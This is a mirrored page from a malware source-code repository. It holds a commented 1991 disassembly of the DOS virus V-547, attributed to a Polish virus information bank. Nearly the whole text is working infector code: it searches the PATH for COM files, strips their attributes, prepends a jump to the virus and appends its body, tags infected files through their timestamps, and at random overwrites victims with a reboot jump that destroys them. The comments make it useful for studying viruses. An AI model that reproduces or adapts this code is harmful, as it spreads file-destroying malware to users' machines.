mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
342 lines
12 KiB
NASM
342 lines
12 KiB
NASM
;----------------------------------------------
|
|
; Virus V-547
|
|
;
|
|
; Dissasembled: Andrzej Kadlof April 1991
|
|
;
|
|
; (C) Polish Section of Virus Information Bank
|
|
;----------------------------------------------
|
|
|
|
0100 E9FD00 JMP 0200 ; jump to virus
|
|
|
|
; ....
|
|
; victim code
|
|
;====================
|
|
; virus entry point
|
|
|
|
0200 EB03 JMP 0205
|
|
|
|
0202 49 42 4D ; IBM
|
|
|
|
; set DS to wirus working area
|
|
|
|
0205 0E PUSH CS
|
|
0206 58 POP AX
|
|
0207 052000 ADD AX,0020 ; [0208] is modified for each victim
|
|
020A 8ED8 MOV DS,AX
|
|
|
|
; restore oryginal first 3 bytes of victim
|
|
|
|
020C 8B162002 MOV DX,[0220]
|
|
0210 2E89160001 MOV CS:[0100],DX
|
|
0215 8A362202 MOV DH,[0222]
|
|
0219 2E88360201 MOV CS:[0102],DH
|
|
|
|
021E B80001 MOV AX,0100 ; application start address
|
|
0221 0E PUSH CS ; store on stack
|
|
0222 50 PUSH AX
|
|
0223 33FF XOR DI,DI
|
|
0225 2E8E062C00 MOV ES,CS:[002C] ; segment of environment
|
|
022A 51 PUSH CX
|
|
022B FC CLD
|
|
022C 32C0 XOR AL,AL
|
|
|
|
022E B90500 MOV CX,0005 ; length of string
|
|
0231 BE1B02 MOV SI,021B ; PATH=
|
|
0234 F3A6 REPZ CMPSB
|
|
0236 740B JZ 0243
|
|
|
|
0238 B9E803 MOV CX,03E8
|
|
023B F2AE REPNZ SCASB
|
|
023D 26803D00 CMP BYTE PTR ES:[DI],00
|
|
0241 75EB JNZ 022E
|
|
|
|
0243 8BF7 MOV SI,DI
|
|
0245 59 POP CX
|
|
0246 51 PUSH CX
|
|
0247 B42C MOV AH,2C ; get time
|
|
0249 CD21 INT 21
|
|
|
|
024B F6C601 TEST DH,01 ; seconds
|
|
024E 7503 JNZ 0253
|
|
|
|
0250 E9B401 JMP 0407
|
|
|
|
0253 88365702 MOV [0257],DH
|
|
0257 06 PUSH ES
|
|
0258 B42F MOV AH,2F ; Get DTA
|
|
025A CD21 INT 21
|
|
|
|
025C 891E2802 MOV [0228],BX
|
|
0260 8C062A02 MOV [022A],ES
|
|
0264 07 POP ES
|
|
0265 BA2C02 MOV DX,022C
|
|
0268 B41A MOV AH,1A ; set DTA
|
|
026A CD21 INT 21
|
|
|
|
026C B44E MOV AH,4E ; find first
|
|
026E BA2302 MOV DX,0223
|
|
0271 B90800 MOV CX,0008 ; volume label
|
|
0274 CD21 INT 21
|
|
|
|
0276 7219 JB 0291
|
|
|
|
0278 813E44022110 CMP WORD PTR [0244],1021 ; date: 1988 January 1
|
|
027E 7511 JNZ 0291
|
|
|
|
0280 81264202E0FF AND WORD PTR [0242],FFE0 ; clear seconds
|
|
0286 813E42022008 CMP WORD PTR [0242],0820 ; time: 01:01:00
|
|
028C 7503 JNZ 0291
|
|
|
|
028E E96A01 JMP 03FB ; exit to application
|
|
|
|
; copy founded string to local buffer
|
|
|
|
0291 BF5802 MOV DI,0258 ; set buffer address
|
|
|
|
0294 26803C3B CMP BYTE PTR ES:[SI],3B ; ';' end of string marker
|
|
0298 740F JZ 02A9
|
|
|
|
029A 26803C00 CMP BYTE PTR ES:[SI],00 ; end of environment
|
|
029E 7409 JZ 02A9
|
|
|
|
02A0 268A04 MOV AL,ES:[SI]
|
|
02A3 8805 MOV [DI],AL
|
|
02A5 47 INC DI
|
|
02A6 46 INC SI
|
|
02A7 EBEB JMP 0294 ; copy next character
|
|
|
|
02A9 81FF5802 CMP DI,0258 ; path name non empty?
|
|
02AD 7509 JNZ 02B8 ; jump if no empty
|
|
|
|
02AF 26803C00 CMP BYTE PTR ES:[SI],00 ; end of environment block?
|
|
02B3 7403 JZ 02B8 ; jump if yes
|
|
|
|
02B5 E93801 JMP 03F0 ; no path name, exit
|
|
|
|
02B8 81FF5802 CMP DI,0258 ; no path name?
|
|
02BC 7412 JZ 02D0 ; jump if yes
|
|
|
|
02BE 26807CFF5C CMP BYTE PTR ES:[SI-01],5C ; '\'
|
|
02C3 740B JZ 02D0
|
|
|
|
02C5 26807CFF2F CMP BYTE PTR ES:[SI-01],2F ; '/'
|
|
02CA 7404 JZ 02D0
|
|
|
|
; add directory sign
|
|
|
|
02CC C6055C MOV BYTE PTR [DI],5C ; '\'
|
|
|
|
; add mask
|
|
|
|
02CF 47 INC DI
|
|
02D0 C7052A2E MOV WORD PTR [DI],2E2A ; '*.'
|
|
02D4 C74502636F MOV WORD PTR [DI+02],6F63 ; 'co'
|
|
02D9 C745046D00 MOV WORD PTR [DI+04],006D ; 'm', 0
|
|
|
|
02DE B44E MOV AH,4E ; find next
|
|
02E0 BA5802 MOV DX,0258 ; path name + mask
|
|
02E3 B90300 MOV CX,0003 ; hiden and read only
|
|
02E6 CD21 INT 21
|
|
|
|
02E8 7303 JAE 02ED ; founded
|
|
|
|
02EA E90301 JMP 03F0 ; search for next path
|
|
|
|
02ED A14202 MOV AX,[0242] ; file time
|
|
02F0 241F AND AL,1F ; extract seconds
|
|
02F2 3C1F CMP AL,1F ; 62 seconds?
|
|
02F4 7463 JZ 0359 ; yes, infected
|
|
|
|
02F6 833E480200 CMP WORD PTR [0248],+00 ; high word of file length
|
|
02FB 755C JNZ 0359 ; file too long
|
|
|
|
02FD 813E460200FA CMP WORD PTR [0246],FA00 ; maximum file length
|
|
0303 7754 JA 0359
|
|
|
|
0305 833E46020A CMP WORD PTR [0246],+0A ; minimum file length
|
|
030A 724D JB 0359 ; file too short
|
|
|
|
; copy file name to local buffer
|
|
|
|
030C BB4A02 MOV BX,024A ; file name
|
|
030F B90D00 MOV CX,000D ; length of file name in DTA
|
|
0312 57 PUSH DI
|
|
0313 8A07 MOV AL,[BX]
|
|
0315 8805 MOV [DI],AL
|
|
0317 43 INC BX
|
|
0318 47 INC DI
|
|
0319 E2F8 LOOP 0313
|
|
|
|
; clear all attributes (CX = 0)
|
|
|
|
031B C60500 MOV BYTE PTR [DI],00 ; end of ASCIIZ string
|
|
031E 5F POP DI
|
|
031F B80143 MOV AX,4301 ; set file attribute
|
|
0322 CD21 INT 21
|
|
|
|
0324 B8023D MOV AX,3D02 ; open file for read/write
|
|
0327 CD21 INT 21
|
|
|
|
0329 722E JB 0359 ; find next
|
|
|
|
032B 8BD8 MOV BX,AX ; handle
|
|
032D A14202 MOV AX,[0242] ; file time
|
|
0330 241F AND AL,1F ; extract seconds
|
|
0332 3C1E CMP AL,1E ; 62?
|
|
0334 750A JNZ 0340
|
|
|
|
; founded file is infected, with probability 1/16 destroy it
|
|
|
|
0336 802657020F AND BYTE PTR [0257],0F ; "random" number
|
|
033B 740A JZ 0347 ; destroy file
|
|
|
|
033D E98400 JMP 03C4 ; restore file data and exit
|
|
|
|
; with probability 1/8 destroy file
|
|
|
|
0340 8026570207 AND BYTE PTR [0257],07
|
|
0345 7515 JNZ 035C ; infect file
|
|
|
|
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
|
|
; classic Vienna 648 destruction (set firt instruction to JMP F000:FFF0)
|
|
|
|
0347 B440 MOV AH,40 ; write file
|
|
0349 B90500 MOV CX,0005
|
|
034C BA1302 MOV DX,0213
|
|
034F CD21 INT 21
|
|
|
|
0351 810E42021F00 OR WORD PTR [0242],001F
|
|
0357 EB6B JMP 03C4 ; exit
|
|
|
|
0359 E98B00 JMP 03E7 ; find next
|
|
|
|
; infect file
|
|
|
|
035C B43F MOV AH,3F ; read file
|
|
035E B90300 MOV CX,0003 ; 3 bytes
|
|
0361 BA2002 MOV DX,0220 ; to local buffer
|
|
0364 CD21 INT 21
|
|
|
|
0366 725C JB 03C4 ; reset file data
|
|
|
|
0368 3D0300 CMP AX,0003 ; check for error
|
|
036B 7557 JNZ 03C4 ; reset file data
|
|
|
|
036D B80042 MOV AX,4200 ; move file ptr to BOF
|
|
0370 B90000 MOV CX,0000
|
|
0373 BA0000 MOV DX,0000
|
|
0376 CD21 INT 21
|
|
|
|
0378 724A JB 03C4 ; reset file data
|
|
|
|
037A A14602 MOV AX,[0246] ; file size
|
|
037D 050F00 ADD AX,000F ; addjust to paragraph border
|
|
0380 25F0FF AND AX,FFF0
|
|
0383 8BE8 MOV BP,AX ; store intermidiate length
|
|
0385 2D0300 SUB AX,0003 ; length of JMP XXXX
|
|
0388 A31902 MOV [0219],AX ; form JMP XXXX in local buffer
|
|
038B B90300 MOV CX,0003 ; number of bytes
|
|
038E BA1802 MOV DX,0218 ; address of JMP virus_code
|
|
0391 B440 MOV AH,40 ; write file
|
|
0393 CD21 INT 21
|
|
|
|
0395 722D JB 03C4 ; reset file data
|
|
|
|
0397 B80242 MOV AX,4202 ; move file ptr rel EOF
|
|
039A 8BD5 MOV DX,BP ; addjuseted file length
|
|
039C 2B164602 SUB DX,[0246] ; real file length
|
|
03A0 B90000 MOV CX,0000 ; high word of file end
|
|
03A3 CD21 INT 21
|
|
|
|
03A5 721D JB 03C4 ; restore file data
|
|
|
|
03A7 81C50001 ADD BP,0100 ; PSP length
|
|
03AB B104 MOV CL,04 ; convert to paragraphs
|
|
03AD D3ED SHR BP,CL
|
|
03AF 892E0800 MOV [0008],BP ; automodyfication of virus code
|
|
03B3 B92302 MOV CX,0223 ; virus length
|
|
03B6 90 NOP
|
|
03B7 BA0000 MOV DX,0000 ; buffer, start of virus code
|
|
03BA B440 MOV AH,40 ; write file
|
|
03BC CD21 INT 21
|
|
|
|
03BE 810E42021E00 OR WORD PTR [0242],001E ; set 62 seconds
|
|
|
|
; restore file time/date stamp
|
|
|
|
03C4 8B164402 MOV DX,[0244] ; restore file date stamp
|
|
03C8 8B0E4202 MOV CX,[0242] ; restore file time stamp
|
|
03CC B80157 MOV AX,5701 ; set file time/date stamp
|
|
03CF CD21 INT 21
|
|
|
|
03D1 B43E MOV AH,3E ; close file
|
|
03D3 CD21 INT 21
|
|
|
|
; restore file attributes
|
|
|
|
03D5 B80143 MOV AX,4301 ; set file attributes
|
|
03D8 33C9 XOR CX,CX
|
|
03DA 8A0E4102 MOV CL,[0241] ; restore file attributes
|
|
03DE BA5802 MOV DX,0258
|
|
03E1 03D6 ADD DX,SI
|
|
03E3 CD21 INT 21
|
|
|
|
03E5 EB14 JMP 03FB ; exit
|
|
|
|
; find next candidate for victim
|
|
|
|
03E7 B44F MOV AH,4F ; find next
|
|
03E9 CD21 INT 21
|
|
|
|
03EB 7203 JB 03F0 ; search for next path
|
|
|
|
03ED E9FDFE JMP 02ED ; check file
|
|
|
|
03F0 46 INC SI
|
|
03F1 26807CFF00 CMP BYTE PTR ES:[SI-01],00 ; end of environment block?
|
|
03F6 7403 JZ 03FB ; yes, exit
|
|
|
|
03F8 E996FE JMP 0291 ; search for next path name
|
|
|
|
; restore DTA
|
|
|
|
03FB B41A MOV AH,1A ; set DTA
|
|
03FD 8B162802 MOV DX,[0228]
|
|
0401 8E1E2A02 MOV DS,[022A]
|
|
0405 CD21 INT 21
|
|
|
|
; exit to application
|
|
|
|
0407 33C0 XOR AX,AX
|
|
0409 33DB XOR BX,BX
|
|
040B 33D2 XOR DX,DX
|
|
040D 33F6 XOR SI,SI
|
|
040F 33FF XOR DI,DI
|
|
0411 59 POP CX
|
|
0412 CB RETF
|
|
|
|
; working area
|
|
|
|
0413 EAF0FF00F0 ; JMP F000:FFF0 instruction for destruction
|
|
0418 E9 FD 00 ; form new first 3 bytes (JMP 0518)
|
|
041B 50 41 54 48 3D ; PATH=
|
|
0420 db ? dup (3) ; first 3 bytes of victim
|
|
|
|
; end of code copied to file
|
|
;==============================
|
|
; working area
|
|
|
|
0423 db ? dup (5) ; mask of file name for FindFirst
|
|
0428 dd ? ; address of old DTA
|
|
042C db ? dup (2C) ; local DTA
|
|
|
|
; 0 db ? dup (15h) ; reserwed [022C]
|
|
; 15h db ? ; atributte [0241]
|
|
; 16h dw ? ; time [0242]
|
|
; 18h dw ? ; date [0244]
|
|
; 1Ah dd ? ; file size [0246]
|
|
; 1Eh db ? dup (0Dh) ; file name [024A] ... [0256]
|
|
|
|
0457 db ? ; system timer seconds
|
|
0458 db ? ; buffer for path name from environment
|